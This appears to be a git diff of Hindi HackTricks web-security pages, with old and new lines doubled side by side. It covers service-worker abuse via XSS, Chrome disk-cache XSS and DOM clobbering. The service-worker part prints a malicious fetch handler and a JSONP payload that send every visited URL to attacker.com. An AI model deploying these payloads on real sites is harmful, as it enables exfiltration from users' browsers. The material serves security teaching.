निम्नलिखित उदाहरण में मैं एक कोड प्रस्तुत करने जा रहा हूँ जो एक नया सर्विस वर्कर **रजिस्टर करेगा** जो `fetch` घटना को सुनेगा और **हमलावर के सर्वर को प्रत्येक फेच की URL भेजेगा** (यह कोड आपको **सर्वर पर अपलोड** करने की आवश्यकता होगी या एक **वंलरेबल JSONP** प्रतिक्रिया के माध्यम से लोड करने की): * **सर्वर पर विभिन्न JS फ़ाइलें अपलोड करने** का एक तरीका और एक **XSS जिससे अपलोड की गई JS फ़ाइल का सेवा कर्मचारी लोड हो**
* **एक विकल्पीय JSONP अनुरोध** जहां आप **आउटपुट को (विभिन्न JS कोड के साथ) मानिपुलेट कर सकते हैं** और एक **XSS** जिससे **पेलोड के साथ JSONP लोड करें** जो एक दुरुपयोगी सेवा कर्मचारी को लोड करेगा।
निम्नलिखित उदाहरण में मैं एक कोड प्रस्तुत करने जा रहा हूँ जो एक नया सेवा कर्मचारी **रजिस्टर करेगा** जो `fetch` घटना को सुनेगा और **हमलावर सर्वर को प्रत्येक फेच किया गया URL भेजेगा** (यह कोड आपको **सर्वर पर अपलोड** करने की आवश्यकता होगी या एक **विकल्पीय JSONP** प्रतिक्रिया के माध्यम से लोड करने की):
```javascript ```javascript
self.addEventListener('fetch', function(e) { self.addEventListener('fetch', function(e) {
e.respondWith(caches.match(e.request).then(function(response) { e.respondWith(caches.match(e.request).then(function(response) {
fetch('https://attacker.com/fetch_url/' + e.request.url) fetch('https://attacker.com/fetch_url/' + e.request.url)
}); });
``` ```
और यह कोड है जो **कर्मी को पंजीकृत** करेगा (जिसे आपको **XSS** का दुरुपयोग करके कार्रवाई करनी चाहिए)। इस मामले में एक **GET** अनुरोध **हमलाव** सर्वर पर भेजा जाएगा जो सूचित करेगा कि सेवा कर्मी का पंजीकरण सफल रहा या नहीं: और यह कोड है जो **कर्मी को पंजीकृत** करेगा (जिसे आपको **XSS** का दुरुपयोग करके निष्पादित करना चाहिए)। इस मामले में एक **GET** अनुरोध **हमलावादियों** सर्वर पर भेजा जाएगा जो सूचित करेगा कि सेवा कर्मी का पंजीकरण सफल रहा या नहीं:
```javascript ```javascript
<script> <script>
window.addEventListener('load', function() { window.addEventListener('load', function() {
@ -64,19 +67,19 @@ xhttp2.send();
}); });
</script> </script>
``` ```
एक वंलरेबल JSONP एंडपॉइंट का दुरुपयोग करने के मामले में आपको मान `var sw` के अंदर डालना चाहिए। उदाहरण के लिए: एक विकल्प JSONP इंडपॉइंट का दुरुपयोग करने के मामले में आपको मान `var sw` के अंदर डालना चाहिए। उदाहरण:
```javascript ```javascript
var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//"; var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//";
``` ```
एक **C2** है जो **सेवा कर्मचारियों का शोषण** करने के लिए समर्पित है जिसे [**Shadow Workers**](https://shadow-workers.github.io) कहा जाता है जो इन दुरुपयोगों का उपयोग करने में बहुत उपयोगी होगा। एक **C2** है जो **सर्विस वर्कर्स का शोषण** करने के लिए समर्पित है जिसे [**Shadow Workers**](https://shadow-workers.github.io) कहा जाता है जो इन वंशावशेषों का दुरुपयोग करने के लिए बहुत उपयोगी होगा।
**24-घंटे कैश निर्देशिका** एक दुर्भाग्यपूर्ण या संक्रमित **सेवा कर्मचारी (SW)** का जीवन सीमित करती है अधिकतम 24 घंटे एक एक्सएसएस दुरुपयोग सुधार के बाद, यदि ऑनलाइन ग्राहक स्थिति मानी जाए। दुरुपयोग को कम करने के लिए, साइट ऑपरेटर SW स्क्रिप्ट का समय-से-जीवन (TTL) कम कर सकते हैं। डेवलपरों को त्वरित निष्क्रिय करने के लिए एक [**सेवा कर्मचारी किल-स्विच**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776) बनाने की सलाह दी जाती है। **24-घंटे कैश निर्देशिका** एक दुर्भाग्यपूर्ण या संक्रमित **सर्विस वर्कर (SW)** का जीवन सीमित करती है अधिकतम 24 घंटे के लिए एक XSS दुरुस्ति सुधार के बाद, यदि ऑनलाइन ग्राहक स्थिति मानी जाए। दुरुस्ति को कम करने के लिए, साइट ऑपरेटर SW स्क्रिप्ट का समय-से-जीवन (TTL) कम कर सकते हैं। डेवलपरों को त्वरित निष्क्रिय करने के लिए एक [**सर्विस वर्कर किल-स्विच**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776) बनाने की सलाह दी जाती है।
## DOM क्लॉबरिंग के माध्यम से SW में `importScripts` का दुरुपयोग ## DOM Clobbering के माध्यम से SW में `importScripts` का दुरुपयोग
ेवा कर्मचारी से बुलाई गई **`importScripts`** फ़ंक्शन **एक विभिन्न डोमेन से स्क्रिप्ट आयात कर सकती है**। यदि इस फ़ंक्शन को एक **पैरामीटर के साथ बुलाया जाता है जिसे एक हमलावार संशोधित कर सकता है** तो वह अपने डोमेन से एक JS स्क्रिप्ट आयात कर सकेगा और एक्सएसएस प्राप्त कर सकेगा। र्विस वर्कर से बुलाई गई **`importScripts`** फ़ंक्शन **एक विभिन्न डोमेन से स्क्रिप्ट आयात कर सकती है**। यदि इस फ़ंक्शन को एक **पैरामीटर के साथ बुलाया जाता है जिसे एक हमलावार संशोधित कर सकता है** तो वह अपने डोमेन से एक JS स्क्रिप्ट आयात कर सकेगा और XSS प्राप्त कर सकेगा।
**यह यहाँ भी सीएसपी संरक्षण को उल्लंघित करता है।** **यह यहाँ तक कि CSP संरक्षण को भी उल्लंघन करता है।**
**उदाहरण विकल्प दुर्भाग्यपूर्ण कोड:** **उदाहरण विकल्प दुर्भाग्यपूर्ण कोड:**
@ -96,7 +99,7 @@ self.importScripts(host + "/sw_extra.js");
``` ```
### DOM Clobbering के साथ ### DOM Clobbering के साथ
DOM Clobbering के बारे में अधिक जानकारी के लिए जांचें: DOM Clobbering क्या है इसके बारे में अधिक जानकारी के लिए जांचें:
{% content-ref url="dom-clobbering.md" %} {% content-ref url="dom-clobbering.md" %}
[dom-clobbering.md](dom-clobbering.md) [dom-clobbering.md](dom-clobbering.md)
@ -104,7 +107,7 @@ DOM Clobbering के बारे में अधिक जानकारी
अगर SW जिसे **`importScripts`** को कॉल करने के लिए उपयोग किया जा रहा है, उस URL/domain को **एक HTML element के अंदर** है, तो **DOM Clobbering के माध्यम से इसे संशोधित करना संभव** है ताकि SW **अपने खुद के डोमेन से एक स्क्रिप्ट लोड कर सके** अगर SW जिसे **`importScripts`** को कॉल करने के लिए उपयोग किया जा रहा है, उस URL/domain को **एक HTML element के अंदर** है, तो **DOM Clobbering के माध्यम से इसे संशोधित करना संभव** है ताकि SW **अपने खुद के डोमेन से एक स्क्रिप्ट लोड कर सके**
इसका उदाहरण के लिए संदर्भ लिंक देखें। इसका उदाहरण के लिए संदर्भ लिंक की जाँच करें।
## संदर्भ ## संदर्भ
@ -112,7 +115,7 @@ DOM Clobbering के बारे में अधिक जानकारी
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वो vulnerabilities खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपके आटैक सरफेस को ट्रैक करता है, proactive धमाकेदार स्कैन चलाता है, APIs से वेब ऐप्स और क्लाउड सिस्टम तक के इश्यूज़ खोजता है। [**यह नि: शुल्क ट्राय करें**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks) आज। वो vulnerabilities खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, proactive खतरा स्कैन चलाता है, APIs से वेब ऐप्स और क्लाउड सिस्टम जैसे आपके पूरे टेक स्टैक में मुद्दे खोजता है। [**यह नि: शुल्क ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -121,10 +124,10 @@ DOM Clobbering के बारे में अधिक जानकारी
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **अपने हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को** * **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details> </details>

View file

@ -1,45 +1,45 @@
# Chrome कैश से XSS तकनीक # Chrome कैश से XSS
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके** * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>
इस तकनीक में चर्चा किया गया है जो दो प्रमुख कैश प्रकारों - **बैक/फॉरवर्ड कैश (bfcache)** और **डिस्क कैश** के व्यवहार और अंतराक्रिया को समझने में सहायक है। bfcache, जो पूरे पृष्ठ का एक संपूर्ण स्नैपशॉट संग्रहित करता है जिसमें जावास्क्रिप्ट हीप शामिल है, बैक/फॉरवर्ड नेविगेशन के लिए डिस्क कैश की तुलना में प्राथमिकता दी जाती है क्योंकि इसकी क्षमता अधिक समग्र स्नैपशॉट संग्रहित करने की होती है। उलट, डिस्क कैश, जो वेब से प्राप्त संसाधनों को जावास्क्रिप्ट हीप को शामिल किए बिना संग्रहित करता है, और संचार लागत को कम करने के लिए बैक/फॉरवर्ड नेविगेशन के लिए उपयोग किया जाता है। डिस्क कैश का एक दिलचस्प पहलू यह है कि इसमें `fetch` का उपयोग करके प्राप्त किए गए संसाधनों को शामिल किया जाता है, जिसका मतलब है कि ब्राउज़र द्वारा कैश से एक्सेस किए गए URL संसाधनों को प्रदर्शित किया जाएगा। इस तकनीक में चर्चा किया गया है जो दो प्रमुख कैश प्रकारों: **बैक/फॉरवर्ड कैश (bfcache)** और **डिस्क कैश** के व्यवहार और अंतराक्रिया को समझने में सहायक है। bfcache, जो पूरे पृष्ठ का एक संपूर्ण स्नैपशॉट संग्रहित करता है जिसमें JavaScript हीप शामिल है, बैक/फॉरवर्ड नेविगेशन के लिए डिस्क कैश की तुलना में प्राथमिकता दी जाती है क्योंकि इसकी योग्यता अधिक समग्र स्नैपशॉट संग्रहित करने में है। उसके विपरीत, डिस्क कैश, जो वेब से प्राप्त संसाधनों को संग्रहित करता है जिसमें JavaScript हीप शामिल नहीं है, और संचार लागत को कम करने के लिए बैक/फॉरवर्ड नेविगेशन के लिए उपयोग किया जाता है। डिस्क कैश का एक दिलचस्प पहलू यह है कि इसमें `fetch` का उपयोग करके प्राप्त किए गए संसाधनों को संग्रहित किया जाता है, जिसका मतलब है कि ब्राउज़र द्वारा कैश से पहुँचे गए URL संसाधनों को प्रदर्शित किया जाएगा।
### मुख्य बिंदु: ### मुख्य बिंदु:
- **bfcache** बैक/फॉरवर्ड नेविगेशन में डिस्क कैश की तुलना में प्राधिकरण रखता है। - **bfcache** बैक/फॉरवर्ड नेविगेशन में डिस्क कैश की तुलना में प्राधिकरण रखता है।
- bfcache को अक्षम करने के लिए: - bfcache को अक्षम करने के लिए:
डिफ़ॉल्ट रूप से, पप्पेटीयर bfcache को अक्षम करता है, जो क्रोमियम की दस्तावेज़ीकरण में दी गई शर्तों के साथ मेल खाता है। bfcache को अक्षम करने का एक प्रभावी तरीका `RelatedActiveContentsExist` का उपयोग करके किया जा सकता है, जिसे `window.open()` के साथ एक पृष्ठ खोलकर प्राप्त किया जा सकता है जो `window.opener` का संदर्भ रखता है। डिफ़ॉल्ट रूप से, Puppeteer bfcache को अक्षम करता है, जो क्रोमियम की दस्तावेज़ीकरण में दी गई शर्तों के साथ मेल खाता है। bfcache को अक्षम करने का एक प्रभावी तरीका `RelatedActiveContentsExist` का उपयोग करके किया जा सकता है, जिसे `window.open()` के साथ एक पृष्ठ खोलकर प्राप्त किया जा सकता है जो `window.opener` का संदर्भ रखता है।
### व्यवहार क पुनरावृत्ति: ### व्यवहार क पुनरावृत्ति:
1. किसी वेबपेज पर जाएं, जैसे, `https://example.com` 1. किसी वेबपेज पर जाएं, उदाहरण के लिए, `https://example.com`
2. `open("http://spanote.seccon.games:3000/api/token")`ा क्रियान्वयन करें, जिससे एक सर्वर प्रतिक्रिया 500 स्थिति कोड के साथ प्राप्त होती है। 2. `open("http://spanote.seccon.games:3000/api/token")`ो क्रियान्वित करें, जिससे सर्वर से 500 स्थिति कोड के साथ प्रतिक्रिया प्राप्त होती है।
3. नए खुले टैब में, `http://spanote.seccon.games:3000/` पर नेविगेट करें। यह क्रिया `http://spanote.seccon.games:3000/api/token` की प्रतिक्रिया को डिस्क कैश के रूप में कैश करती है। 3. नए खुले टैब में, `http://spanote.seccon.games:3000/` पर नेविगेट करें। यह कार्रवाई `http://spanote.seccon.games:3000/api/token` की प्रतिक्रिया को डिस्क कैश के रूप में कैश करती है।
4. `history.back()` का उपयोग करके पिछले पेज पर नेविगेट करें। यह क्रिया पृष्ठ पर कैश किए गए JSON प्रतिक्रिया का प्रदर्शन करती है। 4. `history.back()` का उपयोग करके पिछले पेज पर नेविगेट करें। यह कार्रवाई पृष्ठ पर कैश किए गए JSON प्रतिक्रिया का प्रदर्शन करती है।
डिस्क कैश का उपयोग हुआ है यह सत्यापित करने के लिए गूगल क्रोम में डेवटूल्स का उपयोग करके किया जा सकता है डिस्क कैश का उपयोग हुआ है यह सत्यापित किया जा सकता है गूगल क्रोम में डेवटूल्स का उपयोग करके।
bfcache और डिस्क कैश पर अधिक विवरण के लिए, संदर्भ [web.dev पर bfcache](https://web.dev/i18n/en/bfcache/) और [क्रोमियम के डिज़ाइन दस्तावेज़ों पर डिस्क कैश](https://www.chromium.org/developers/design-documents/network-stack/disk-cache/) मिल सकते हैं। bfcache और डिस्क कैश पर अधिक विवरण के लिए, संदर्भ [web.dev पर bfcache](https://web.dev/i18n/en/bfcache/) और [क्रोमियम के डिज़ाइन दस्तावेज़ों पर डिस्क कैश](https://www.chromium.org/developers/design-documents/network-stack/disk-cache/) में मिल सकते हैं।
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके** * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>

View file

@ -4,24 +4,24 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** प्राप्त करना चाहते हैं? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को** * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>
## **मूल बातें** ## **मूल बातें**
**HTML टैग** में **`id`** और **`name`** विशेषताओं के साथ **JS संदर्भ** में **वैश्विक चर** उत्पन्न करना संभव है। HTML टैग में **`id`** और **`name`** विशेषताओं के साथ **JS संदर्भ** में **वैश्विक चर** उत्पन्न करना संभव है।
```html ```html
<form id=x></form> <form id=x></form>
<script> console.log(typeof document.x) //[object HTMLFormElement] </script> <script> console.log(typeof document.x) //[object HTMLFormElement] </script>
``` ```
**केवल** कुछ तत्व ही **नाम विशेषता** का उपयोग कर सकते हैं जिससे ग्लोबल को क्लॉबर किया जा सकता है, वे हैं: `embed`, `form`, `iframe`, `image`, `img` और `object`. **केवल** कुछ तत्वों का उपयोग करके **नाम विशेषता** को ग्लोबल्स को ले जाने के लिए किया जा सकता है, वे हैं: `embed`, `form`, `iframe`, `image`, `img` और `object`.
दिलचस्प है, जब आप एक **फॉर्म तत्व** का उपयोग करके एक वेरिएबल को **क्लॉबर** करते हैं, तो आपको तत्व के खुद का **`toString`** मान मिलेगा: `[object HTMLFormElement]` लेकिन **एंकर** के साथ **`toString`** एंकर **`href`** होगा। इसलिए, अगर आप **`a`** टैग का उपयोग करके क्लॉबर करते हैं, तो आप **नियंत्रण** कर सकते हैं जब यह **स्ट्रिंग के रूप में व्यवहार किया जाता है**: दिलचस्प है, जब आप एक **फॉर्म तत्व** का उपयोग करके एक वेरिएबल को **क्लॉबर** करते हैं, तो आपको तत्व के खुद का **`toString`** मान मिलेगा: `[object HTMLFormElement]` लेकिन **एंकर** के साथ **`toString`** एंकर **`href`** होगा। इसलिए, अगर आप **`a`** टैग का उपयोग करके क्लॉबर करते हैं, तो आप **मान** को **स्ट्रिंग के रूप में व्यवहारित** करते समय **नियंत्रण** कर सकते हैं:
```html ```html
<a href="controlled string" id=x></a> <a href="controlled string" id=x></a>
<script> <script>
@ -47,7 +47,7 @@ console.log(x.y)//controlled
alert(x.y.z.value)//controlled alert(x.y.z.value)//controlled
</script> </script>
``` ```
Clobbering अधिक विशेषताएँ **अधिक जटिल है लेकिन फिर भी संभव है**, iframes का उपयोग करके: Clobbering अधिक गुण है **अधिक जटिल है लेकिन फिर भी संभव है**, iframes का उपयोग करके:
```html ```html
<iframe name=x srcdoc="<a id=y href=controlled></a>"></iframe> <iframe name=x srcdoc="<a id=y href=controlled></a>"></iframe>
<style>@import 'https://google.com';</style> <style>@import 'https://google.com';</style>
